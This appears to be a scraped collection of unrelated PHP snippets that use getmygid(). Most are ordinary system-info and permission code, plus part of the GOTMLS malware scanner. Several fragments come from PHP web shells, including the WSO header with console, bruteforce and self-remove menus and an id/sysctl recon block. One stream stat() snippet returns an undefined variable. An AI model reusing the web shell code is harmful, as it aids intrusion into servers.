/** * Checks the GID of the PHP process to make sure it is above PHPSECINFO_MIN_SAFE_GID * * @see PHPSECINFO_MIN_SAFE_GID */ function _execTest() { if (getmygid() >= PHPSECINFO_MIN_SAFE_GID) { return PHPSECINFO_TEST_RESULT_OK; } return PHPSECINFO_TEST_RESULT_WARN; }
/** * @param CommandSender $sender */ public function sendPHPInfo(CommandSender $sender) { $info = ["CWD" => getcwd(), "GID" => getmygid(), "PID" => getmypid(), "UID" => getmyuid(), "Memory-usage" => memory_get_usage(true), "Memory-peak-usage" => memory_get_peak_usage(true), "PHP-version" => phpversion(), "Zend-version" => zend_version()]; foreach ($info as $key => $value) { $sender->sendMessage($key . ": " . $value); } }
public function mount() { $this->runCommand("sudo mount -t tmpfs -o size={$this->getSizeMb()}m tmpfs {$this->ram_disk_path}"); $uid = getmyuid(); $gid = getmygid(); $this->runCommand("sudo chown {$uid}:{$gid} {$this->ram_disk_path}"); $this->runCommand("chmod 0755 {$this->ram_disk_path}"); }
/** * sd_pid_notify_with_fds PHP implementation * * @param int $pid FIXME currently not usable! * @param bool $unset_environment * @param string $state * @param array $fds * * @return int * * @link https://github.com/systemd/systemd/blob/master/src/libsystemd/sd-daemon/sd-daemon.c */ function sd_pid_notify_with_fds($pid, $unset_environment, $state, array $fds) { $state = trim($state); if ('' === $state) { $r = -EINVAL; goto finish; } $e = getenv('NOTIFY_SOCKET'); if (!$e) { return 0; } /* Must be an abstract socket, or an absolute path */ if (strlen($e) < 2 || strpos($e, '@') !== 0 && strpos($e, '/') !== 0) { $r = -EINVAL; goto finish; } $fd = socket_create(AF_UNIX, SOCK_DGRAM, 0); if (!$fd) { $r = -1 * socket_last_error(); goto finish; } $msghdr = ['name' => ['path' => $e], 'iov' => [$state . "\n"], 'control' => []]; if (strpos($msghdr['name']['path'], '@') === 0) { $msghdr['name'][0] = ""; } $pid = (int) $pid; $have_pid = $pid && getmypid() !== $pid; if (count($fds) > 0 || $have_pid) { if (count($fds)) { $msghdr['control'][] = ['level' => SOL_SOCKET, 'type' => SCM_RIGHTS, 'data' => $fds]; } if ($have_pid) { $msghdr['control'][] = ['level' => SOL_SOCKET, 'type' => SCM_CREDENTIALS, 'data' => ['pid' => $pid, 'uid' => getmyuid(), 'gid' => getmygid()]]; } } /* First try with fake ucred data, as requested */ if (@socket_sendmsg($fd, $msghdr, MSG_NOSIGNAL) !== false) { $r = 1; goto finish; } /* If that failed, try with our own ucred instead */ if ($have_pid) { $msghdr['control'] = []; if (@socket_sendmsg($fd, $msghdr, MSG_NOSIGNAL) !== false) { $r = 1; goto finish; } } $r = -1 * socket_last_error($fd); finish: if (isset($fd) && $fd) { socket_close($fd); } if ($unset_environment) { putenv('NOTIFY_SOCKET'); } return $r; }
function randomBytes($length = 16, $secure = true, $raw = true, $startEntropy = "", &$rounds = 0, &$drop = 0) { static $lastRandom = ""; $output = ""; $length = abs((int) $length); $secureValue = ""; $rounds = 0; $drop = 0; while (!isset($output[$length - 1])) { //some entropy, but works ^^ $weakEntropy = array(is_array($startEntropy) ? implode($startEntropy) : $startEntropy, serialize(stat(__FILE__)), __DIR__, PHP_OS, microtime(), (string) lcg_value(), (string) PHP_MAXPATHLEN, PHP_SAPI, (string) PHP_INT_MAX . "." . PHP_INT_SIZE, serialize($_SERVER), serialize(get_defined_constants()), get_current_user(), serialize(ini_get_all()), (string) memory_get_usage() . "." . memory_get_peak_usage(), php_uname(), phpversion(), extension_loaded("gmp") ? gmp_strval(gmp_random(4)) : microtime(), zend_version(), (string) getmypid(), (string) getmyuid(), (string) mt_rand(), (string) getmyinode(), (string) getmygid(), (string) rand(), function_exists("zend_thread_id") ? (string) zend_thread_id() : microtime(), var_export(@get_browser(), true), function_exists("getrusage") ? @implode(getrusage()) : microtime(), function_exists("sys_getloadavg") ? @implode(sys_getloadavg()) : microtime(), serialize(get_loaded_extensions()), sys_get_temp_dir(), (string) disk_free_space("."), (string) disk_total_space("."), uniqid(microtime(), true), file_exists("/proc/cpuinfo") ? file_get_contents("/proc/cpuinfo") : microtime()); shuffle($weakEntropy); $value = hash("sha512", implode($weakEntropy), true); $lastRandom .= $value; foreach ($weakEntropy as $k => $c) { //mixing entropy values with XOR and hash randomness extractor $value ^= hash("sha256", $c . microtime() . $k, true) . hash("sha256", mt_rand() . microtime() . $k . $c, true); $value ^= hash("sha512", (string) lcg_value() . $c . microtime() . $k, true); } unset($weakEntropy); if ($secure === true) { $strongEntropyValues = array(is_array($startEntropy) ? hash("sha512", $startEntropy[($rounds + $drop) % count($startEntropy)], true) : hash("sha512", $startEntropy, true), file_exists("/dev/urandom") ? fread(fopen("/dev/urandom", "rb"), 64) : str_repeat("", 64), (function_exists("openssl_random_pseudo_bytes") and version_compare(PHP_VERSION, "5.3.4", ">=")) ? openssl_random_pseudo_bytes(64) : str_repeat("", 64), function_exists("mcrypt_create_iv") ? mcrypt_create_iv(64, MCRYPT_DEV_URANDOM) : str_repeat("", 64), $value); $strongEntropy = array_pop($strongEntropyValues); foreach ($strongEntropyValues as $value) { $strongEntropy = $strongEntropy ^ $value; } $value = ""; //Von Neumann randomness extractor, increases entropy $bitcnt = 0; for ($j = 0; $j < 64; ++$j) { $a = ord($strongEntropy[$j]); for ($i = 0; $i < 8; $i += 2) { $b = ($a & 1 << $i) > 0 ? 1 : 0; if ($b != (($a & 1 << $i + 1) > 0 ? 1 : 0)) { $secureValue |= $b << $bitcnt; if ($bitcnt == 7) { $value .= chr($secureValue); $secureValue = 0; $bitcnt = 0; } else { ++$bitcnt; } ++$drop; } else { $drop += 2; } } } } $output .= substr($value, 0, min($length - strlen($output), $length)); unset($value); ++$rounds; } $lastRandom = hash("sha512", $lastRandom, true); return $raw === false ? bin2hex($output) : $output; }
public function url_stat($path) { $mode = 0666; $uid = 0; $gid = 0; $len = strlen('fiemulate://'); $type = substr($path, $len, 1); switch (substr($path, $len, 1)) { case 'u': $uid = getmyuid(); $gid = getmygid() + 1; switch (substr($path, $len + 2)) { case 'not_readable': $mode &= ~0400; break; case 'not_writable': $mode &= ~0200; break; } break; case 'g': $uid = getmyuid() + 1; $gid = getmygid(); switch (substr($path, $len + 2)) { case 'not_readable': $mode &= ~0440; break; case 'not_writable': $mode &= ~0220; break; } break; case 'o': $uid = getmyuid() + 1; $gid = getmygid() + 1; switch (substr($path, $len + 2)) { case 'not_readable': $mode &= ~0444; break; case 'not_writable': $mode &= ~0222; break; } break; case 'a': $uid = getmyuid(); $gid = getmygid(); break; } $keys = array('dev', 'ino', 'mode', 'nlink', 'uid', 'gid', 'rdev', 'size', 'atime', 'mtime', 'ctime', 'blksize', 'blocks'); $values = array(0, 0, $mode, 0, $uid, $gid, 0, 0, 0, 0, 0, 0, 0); foreach ($keys as $index => $key) { $values[$key] = $values[$index]; } return $values; }
public static function matchingLetter($file) { if (fileowner($file) === getmyuid()) { return 'u'; } if (filegroup($file) === getmygid()) { return 'g'; } return 'o'; }
/** * @param null $value * * @return bool */ public static function state($value = null) { $stateFile = sprintf("/tmp/sonata_behat_test_%s.state", getmygid()); if (!is_file($stateFile)) { file_put_contents($stateFile, "0"); } if ($value === null) { return file_get_contents($stateFile) === "0" ? false : true; } file_put_contents($stateFile, $value === true ? "1" : "0"); }
public function pull_project() { if (!is_cli()) { echo 'This controller must run from command line interface only.' . PHP_EOL; return; } exec('git pull'); exec('chown ' . getmyuid() . ':' . getmygid() . ' ' . FCPATH . '.. -R'); exec('chmod 0777 ' . APPPATH . 'cache'); exec('chmod 0777 ' . APPPATH . 'logs'); }
/** * Check if path is writable. * * @param string $path * @return bool */ public static function isWritable($path) { if (!is_writable($path)) { return false; } if (ini_get('safe_mode')) { if (ini_get('safe_mode_gid') ? getmygid() != filegroup($path) : getmyuid() != fileowner($path)) { return false; } } return true; }
public function __construct() { $this->config = array('filename' => basename(__FILE__), 'username' => '', 'password' => '', 'interpreter' => 'shell_exec', 'current_user' => get_current_user(), 'hostname' => function_exists('gethostname') ? gethostname() : $_SERVER['HTTP_HOST'], 'server_address' => isset($_SERVER['SERVER_ADDR']) ? $_SERVER['SERVER_ADDR'] : '127.0.0.1', 'server_port' => $_SERVER['SERVER_PORT'], 'request_time' => $_SERVER['REQUEST_TIME'], 'php_owner_uid' => getmyuid(), 'php_owner_gid' => getmygid(), 'php_process_id' => getmypid(), 'inode_script' => getmyinode(), 'last_page_modification' => getlastmod(), 'cwd' => getcwd()); if (isset($_SESSION['interpreter'])) { $this->config['interpreter'] = $_SESSION['interpreter']; } if (isset($_SESSION['cwd']) && $_SESSION['cwd'] != $this->config['cwd']) { chdir($_SESSION['cwd']); $this->config['cwd'] = getcwd(); } $this->config['prompt'] = $this->get_prompt(); }
protected function _init() { $this->os = new Zend_Environment_Field(array('title' => 'OS', 'info' => 'Host operating system', 'value' => PHP_OS)); $this->uid = new Zend_Environment_Field(array('title' => 'Script uid', 'info' => 'script user id', 'value' => getmyuid())); $this->gid = new Zend_Environment_Field(array('title' => 'Script gid', 'info' => 'script group id', 'value' => getmygid())); $this->script_username = new Zend_Environment_Field(array('title' => 'Script username', 'info' => 'username obtained via HTTP authentication', 'value' => get_current_user())); $this->memory = new Zend_Environment_Field(array('title' => 'Memory', 'info' => 'Memory used by this script on host')); if (function_exists('memory_get_usage')) { $this->memory->value = memory_get_usage(); } else { $this->memory->notice = 'memory_get_usage() not enabled'; } }
function Myevents($text=null,$function=null){ $pid=getmygid(); $file="/var/log/artica-postfix/watchdog.debug"; @mkdir(dirname($file)); $logFile=$file; if (is_file($logFile)) { $size=filesize($logFile); if($size>100000){unlink($logFile);} } $date=date('Y-m-d H:i:s'). " [$pid]: "; $f = @fopen($logFile, 'a'); @fwrite($f, "$date $function:: $text\n"); @fclose($f); }
public function stat() { $time = time(); if ($this->_getStreamContent() != null) { $size = strlen($this->_getStreamContent()); } else { $size = 0; } $uid = getmyuid(); $gid = getmygid(); $mode = octdec(100000 + $this->_getStreamMode()); $keys = array('dev' => 0, 'ino' => 0, 'mode' => $mode, 'nlink' => 0, 'uid' => $uid, 'gid' => $gid, 'rdev' => 0, 'size' => $size, 'atime' => $time, 'mtime' => $time, 'ctime' => $time, 'blksize' => 0, 'blocks' => 0); $return_value = $keys + array_values($keys); return $return; }
public function __construct() { $this->scriptFilename = $this->getServerVar('SCRIPT_FILENAME'); $this->documentRoot = $this->getServerVar('DOCUMENT_ROOT'); $this->httpHost = $this->getServerVar('HTTP_HOST'); $this->adminEmail = $this->getServerVar('SERVER_ADMIN'); $this->time = date('Y.m.d H:i:s', $this->getServerVar('REQUEST_TIME')); $this->serverAddr = $this->getServerVar('SERVER_ADDR'); $this->serverSoftware = $this->getServerVar('SERVER_SOFTWARE'); $this->serverGateway = $this->getServerVar('GATEWAY_INTERFACE'); $this->serverSignature = $this->getServerVar('SERVER_SIGNATURE'); $this->serverHostname = @php_uname('n'); $this->serverPlatform = @php_uname('s') . ' ' . @php_uname('r') . ' ' . @php_uname('v'); $this->serverArchitecture = @php_uname('m'); $this->username = '******' . @getmyuid() . ', gid: ' . @getmygid(); $this->pathinfo = getcwd(); $this->phpinfo = $this->getCompactPhpInfo(); }
function printHeader() { if(empty($_POST['charset'])) $_POST['charset'] = "UTF-8"; global $color; ?> <html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?> - WSO <?=VERSION?></title> <style> body { background-color:#444;font: 9pt Lucida,Verdana;color:#e1e1e1;margin: 0; } td,th { font: 9pt Lucida,Verdana;vertical-align:top; } table.info { color:#fff;background-color:#222; } span { color:<?=$color?>;font-weight: bolder; } h1 { color:<?=$color?>;border-left:5px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content { padding: 5px;margin-left:5px;background-color:#333; } a { text-decoration:none; color:<?=$color?>; } a:hover { text-decoration:underline; } .ml1 { border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea { width:100%;height:250px; } input, textarea, select { margin:0;color:#fff;background-color:#555;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier New"; } form { margin:0px; } #toolsTbl { text-align:center; } .toolsInp { width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .main td, th{vertical-align:middle} .l1 {background-color:#444} pre{font-family:Courier,Monospace;} </style> <script> function set(a,c,p1,p2,p3,charset) { if(a != null)document.mf.a.value=a; if(c != null)document.mf.c.value=c; if(p1 != null)document.mf.p1.value=p1; if(p2 != null)document.mf.p2.value=p2; if(p3 != null)document.mf.p3.value=p3; if(charset != null)document.mf.charset.value=charset; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); document.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = "ajax=true"; for(i=0;i<document.mf.elements.length;i++) params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value); sr('<?=$_SERVER['REQUEST_URI'];?>', params); } function sr(url, params) { if (window.XMLHttpRequest) { req = new XMLHttpRequest(); req.onreadystatechange = processReqChange; req.open("POST", url, true); req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); req.send(params); } else if (window.ActiveXObject) { req = new ActiveXObject("Microsoft.XMLHTTP"); if (req) { req.onreadystatechange = processReqChange; req.open("POST", url, true); req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); req.send(params); } } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { //alert(req.responseText); var reg = new RegExp("(\\d+)([\\S\\s]*)", "m"); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert("Request error!"); } </script> <head><body> <form method=post name=mf style='display:none;'> <input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'> <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'> <input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'> <input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'> <input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'> <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> </form> <?php $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $millink='http://milw0rm.com/search.php?dong='; if( strpos('Linux', $kernel) !== false ) $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) ); else $millink .= urlencode( $kernel . ' ' . substr($release,0,3) ); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0;$i<$n-1;$i++) { $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; for($j=0;$j<=$i;$j++) $cwd_links .= $path[$j].'/'; $cwd_links .= "\")'>".$path[$i]."/</a>"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>'; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network', 'Logout'=>'Logout', 'Self remove' => 'SelfRemove'); $menu = ''; foreach($m as $k => $v) $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>'; $drives = ""; if ($GLOBALS['os'] == 'win') { foreach( range('a','z') as $drive ) if (is_dir($drive.':\\')) $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; } echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'. '<td><nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[milw0rm]</a></nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00bb00><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'. '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'. '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">'; }
function getuser() { $out = get_current_user(); if ($out != "SYSTEM") { if (($out = ex('id')) == '') { $out = "uid=" . getmyuid() . "(" . get_current_user() . ") gid=" . getmygid(); } } return $out; }
$lin2 = ex('sysctl -n kernel.osrelease'); } if (!empty($bsd1) && !empty($bsd2)) { $sysctl = "{$bsd1} {$bsd2}"; } else { if (!empty($lin1) && !empty($lin2)) { $sysctl = "{$lin1} {$lin2}"; } else { $sysctl = "-"; } } echo ws(3) . $sysctl . "<br>"; echo ws(3) . ex('echo $OSTYPE') . "<br>"; echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "<br>"; $id = ex('id'); echo !empty($id) ? ws(3) . $id . "<br>" : ws(3) . "user="******" uid=" . @getmyuid() . " gid=" . @getmygid() . "<br>"; echo ws(3) . $dir; echo ws(3) . '( ' . perms(@fileperms($dir)) . ' )'; echo "</b></font>"; } else { echo '<font color=blue><b>OS :' . ws(1) . '<br>Server :' . ws(1) . '<br>User :'******'<br>pwd :' . ws(1) . '</b></font><br>'; echo "</td><td>"; echo "<font face=Verdana size=-2 color=red><b>"; echo ws(3) . @substr(@php_uname(), 0, 120) . "<br>"; echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "<br>"; echo ws(3) . @get_current_user() . "<br>"; echo ws(3) . $dir; echo "<br></font>"; } echo "</font>"; echo "</td></tr></table>";
<?php print "{"; print "\"GroupId\":\"" . getmygid() . "\","; print "\"UserId\":\"" . getmyuid() . "\""; print "}";
function GOTMLS_scanfile($file) { global $wp_version, $GOTMLS_threat_files, $GOTMLS_threats_found, $GOTMLS_chmod_file, $GOTMLS_chmod_dir, $GOTMLS_file_contents, $GOTMLS_new_contents; $GOTMLS_threats_found = array(); $gt = ">"; $lt = "<"; $found = false; $threat_link = ""; $className = "scanned"; $clean_file = GOTMLS_encode($file); $file_name = GOTMLS_explode_dir($file); $file_parts = explode(".", "." . array_pop($file_name)); if (is_file($file) && ($filesize = filesize($file)) && ($GOTMLS_file_contents = @file_get_contents($file))) { if (isset($GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["wp_core"]["{$wp_version}"]) && is_array($GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["wp_core"]["{$wp_version}"])) { $whitelist = array_flip($GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["wp_core"]["{$wp_version}"]); } else { $whitelist = array(); } foreach ($GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["whitelist"] as $whitelist_file => $non_threats) { if (is_array($non_threats) && count($non_threats) > 1) { if (isset($non_threats[0])) { unset($non_threats[0]); } $whitelist = array_merge($whitelist, $non_threats); } } if (isset($whitelist[md5($GOTMLS_file_contents) . 'O' . $filesize])) { return GOTMLS_return_threat($className, "checked.gif?{$className}", $file, $threat_link); } $GOTMLS_new_contents = $GOTMLS_file_contents; if (isset($GLOBALS["GOTMLS"]["log"]["settings"]["check_custom"]) && strlen($GLOBALS["GOTMLS"]["log"]["settings"]["check_custom"]) && isset($_GET['eli']) && substr($GLOBALS["GOTMLS"]["log"]["settings"]["check_custom"], 0, 1) == '/' && ($found = GOTMLS_check_threat($GLOBALS["GOTMLS"]["log"]["settings"]["check_custom"]))) { $className = "known"; } else { $path = str_replace("//", "/", "/" . str_replace("\\", "/", substr($file, strlen(ABSPATH)))); if (isset($_SESSION["GOTMLS_debug"])) { $_SESSION["GOTMLS_debug"]["file"] = $file; $_SESSION["GOTMLS_debug"]["last"]["total"] = microtime(true); } foreach ($GLOBALS["GOTMLS"]["tmp"]["threat_levels"] as $threat_level) { if (isset($_SESSION["GOTMLS_debug"])) { $_SESSION["GOTMLS_debug"]["threat_level"] = $threat_level; $_SESSION["GOTMLS_debug"]["last"]["threat_level"] = microtime(true); } if (in_array($threat_level, $GLOBALS["GOTMLS"]["log"]["settings"]["check"]) && !$found && isset($GLOBALS["GOTMLS"]["tmp"]["definitions_array"][$threat_level]) && ($threat_level != "wp_core" || substr($file, 0, strlen(ABSPATH)) == ABSPATH && isset($GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["wp_core"]["{$wp_version}"]["{$path}"])) && (!array_key_exists($threat_level, $GOTMLS_threat_files) || substr($file . "e", -1 * strlen($GOTMLS_threat_files[$threat_level] . "e")) == $GOTMLS_threat_files[$threat_level] . "e") && ($found = GOTMLS_check_threat($GLOBALS["GOTMLS"]["tmp"]["definitions_array"][$threat_level], $file))) { $className = $threat_level; } } if (isset($_SESSION["GOTMLS_debug"])) { $file_time = round(microtime(true) - $_SESSION["GOTMLS_debug"]["last"]["total"], 5); if (isset($_SESSION["GOTMLS_debug"]["total"]["total"])) { $_SESSION["GOTMLS_debug"]["total"]["total"] += $file_time; } else { $_SESSION["GOTMLS_debug"]["total"]["total"] = $file_time; } if (isset($_SESSION["GOTMLS_debug"]["total"]["count"])) { $_SESSION["GOTMLS_debug"]["total"]["count"]++; } else { $_SESSION["GOTMLS_debug"]["total"]["count"] = 1; } if (!isset($_SESSION["GOTMLS_debug"]["total"]["least"]) || $file_time < $_SESSION["GOTMLS_debug"]["total"]["least"]) { $_SESSION["GOTMLS_debug"]["total"]["least"] = $file_time; } if (!isset($_SESSION["GOTMLS_debug"]["total"]["most"]) || $file_time > $_SESSION["GOTMLS_debug"]["total"]["most"]) { $_SESSION["GOTMLS_debug"]["total"]["most"] = $file_time; } } } } else { $GOTMLS_file_contents = is_file($file) ? is_readable($file) ? filesize($file) ? __("Failed to read file contents!", 'gotmls') : __("Empty file!", 'gotmls') : (isset($_GET["eli"]) ? @chmod($file, $GOTMLS_chmod_file) ? __("Fixed file permissions! (try again)", 'gotmls') : __("File permissions read-only!", 'gotmls') : __("File not readable!", 'gotmls')) : __("File does not exist!", 'gotmls'); // $threat_link = GOTMLS_error_link($GOTMLS_file_contents, $file); $className = "errors"; } if (count($GOTMLS_threats_found)) { $threat_link = $lt . 'a target="GOTMLS_iFrame" href="' . GOTMLS_script_URI . '&GOTMLS_scan=' . $clean_file . '" id="list_' . $clean_file . '" onclick="loadIframe(\'' . str_replace("\"", """, $lt . 'div style="float: left;"' . $gt . 'Examine File ... ' . $lt . '/div' . $gt . $lt . 'div style="overflow: hidden; position: relative; height: 20px;"' . $gt . $lt . 'div style="position: absolute; right: 0px; text-align: right; width: 9000px;"' . $gt . GOTMLS_strip4java($file)) . $lt . '/div' . $gt . $lt . '/div' . $gt . '\');" class="GOTMLS_plugin"' . $gt; if ($className == "errors") { $threat_link = GOTMLS_error_link($GOTMLS_file_contents, $file); $imageFile = "/blocked"; } elseif ($className != "potential") { if (isset($_POST["GOTMLS_fix"]) && is_array($_POST["GOTMLS_fix"]) && in_array($clean_file, $_POST["GOTMLS_fix"])) { if ($className == "timthumb") { if (($source = GOTMLS_get_URL("http://{$className}.googlecode.com/svn/trunk/{$className}.php")) && strlen($source) > 500) { $GOTMLS_new_contents = $source; } else { $GOTMLS_file_contents = ""; } } elseif ($className == 'wp_core') { $path = str_replace("//", "/", "/" . str_replace("\\", "/", substr($file, strlen(ABSPATH)))); if (substr($file, 0, strlen(ABSPATH)) == ABSPATH && isset($GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["wp_core"]["{$wp_version}"]["{$path}"]) && $GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["wp_core"]["{$wp_version}"]["{$path}"] != md5($GOTMLS_file_contents) . "O" . strlen($GOTMLS_file_contents) && ($source = GOTMLS_get_URL("http://core.svn.wordpress.org/tags/{$wp_version}{$path}")) && $GLOBALS["GOTMLS"]["tmp"]["definitions_array"]["wp_core"]["{$wp_version}"]["{$path}"] == md5($source) . "O" . strlen($source)) { $GOTMLS_new_contents = $source; } else { $GOTMLS_file_contents = ""; } } else { $GOTMLS_new_contents = trim(preg_replace('/' . $lt . '\\?(php)?\\s*(\\?' . $gt . '|$)/i', "", $GOTMLS_new_contents)); } if (strlen($GOTMLS_file_contents) > 0 && GOTMLS_write_quarantine($file, $className) !== false && (strlen($GOTMLS_new_contents) == 0 && isset($_GET["eli"]) && @unlink($file) || GOTMLS_file_put_contents($file, $GOTMLS_new_contents) !== false)) { echo __("Success!", 'gotmls'); return "/*--{$gt}*" . "/\nfixedFile('{$clean_file}');\n/*{$lt}!--*" . "/"; } else { echo __("Failed:", 'gotmls') . ' ' . (strlen($GOTMLS_file_contents) ? is_writable(dirname(GOTMLS_quarantine($file))) ? is_writable(dirname($file)) && is_writable($file) ? __("reason unknown!", 'gotmls') : __("file not writable!", 'gotmls') : __("quarantine not writable!", 'gotmls') . ' ' : __("no file contents!", 'gotmls')); if (isset($_GET["eli"])) { echo 'uid=' . getmyuid() . '(' . get_current_user() . '),gid=' . getmygid() . (is_writable(dirname(GOTMLS_quarantine($file))) ? $lt . 'br' . $gt . $lt . 'pre' . $gt . 'file_stat' . print_r(stat($file), true) : $lt . 'br' . $gt . $lt . 'pre' . $gt . dirname(GOTMLS_quarantine($file)) . ' stat' . print_r(stat(dirname(GOTMLS_quarantine($file))), true)); } return "/*--{$gt}*" . "/\nfailedFile('{$clean_file}');\n/*{$lt}!--*" . "/"; } } $threat_link = $lt . 'input type="checkbox" name="GOTMLS_fix[]" value="' . $clean_file . '" id="check_' . $clean_file . ($className != "wp_core" ? '" checked="' . $className : '') . '" /' . $gt . $threat_link; $imageFile = "threat"; } elseif (isset($_POST["GOTMLS_fix"]) && is_array($_POST["GOTMLS_fix"]) && in_array($clean_file, $_POST["GOTMLS_fix"])) { echo __("Already Fixed!", 'gotmls'); return "/*-->*" . "/\nfixedFile('{$clean_file}');\n/*<!--*" . "/"; } else { $imageFile = "question"; } return GOTMLS_return_threat($className, $imageFile, $file, str_replace("GOTMLS_plugin", "GOTMLS_plugin {$className}", $threat_link)); } elseif (isset($_POST["GOTMLS_fix"]) && is_array($_POST["GOTMLS_fix"]) && in_array($clean_file, $_POST["GOTMLS_fix"])) { if (GOTMLS_trailingslashit($GLOBALS["GOTMLS"]["tmp"]["quarantine_dir"]) == substr($file, 0, strlen(GOTMLS_trailingslashit($GLOBALS["GOTMLS"]["tmp"]["quarantine_dir"])))) { if (count($file_parts) > 1 && strtolower($file_parts[count($file_parts) - 1]) == "gotmls" && @rename($file, GOTMLS_decode($file_parts[count($file_parts) - 2]))) { echo __("Restored!", 'gotmls'); return "/*--{$gt}*" . "/\nfixedFile('{$clean_file}');\n/*{$lt}!--*" . "/"; } else { echo __("Restore Failed!", 'gotmls'); return ""; } } else { echo __("Already Fixed!", 'gotmls'); return "/*--{$gt}*" . "/\nfixedFile('{$clean_file}');\n/*{$lt}!--*" . "/"; } } else { return GOTMLS_return_threat($className, ($className == "scanned" ? "checked" : "blocked") . ".gif?{$className}", $file, $threat_link); } }
/** * Check UID in folder and Script * Read http://www.php.net/manual/en/features.safe-mode.php to understand safe_mode * * @class nggAdmin * @param string $foldername * @return bool $result */ function check_safemode($foldername) { if (SAFE_MODE) { $script_uid = ini_get('safe_mode_gid') ? getmygid() : getmyuid(); $folder_uid = fileowner($foldername); if ($script_uid != $folder_uid) { $message = sprintf(__('SAFE MODE Restriction in effect! You need to create the folder <strong>%s</strong> manually', 'nggallery'), $foldername); $message .= '<br />' . sprintf(__('When safe_mode is on, PHP checks to see if the owner (%s) of the current script matches the owner (%s) of the file to be operated on by a file function or its directory', 'nggallery'), $script_uid, $folder_uid); nggGallery::show_error($message); return false; } } return true; }
protected function checkPermission($user, $group, $other) { $permissions = $this->stat['mode'] & 07777; switch (true) { case getmyuid() === $this->stat['uid']: return ($permissions & $user) > 0; case getmygid() === $this->stat['gid']: return ($permissions & $group) > 0; default: return ($permissions & $other) > 0; } }
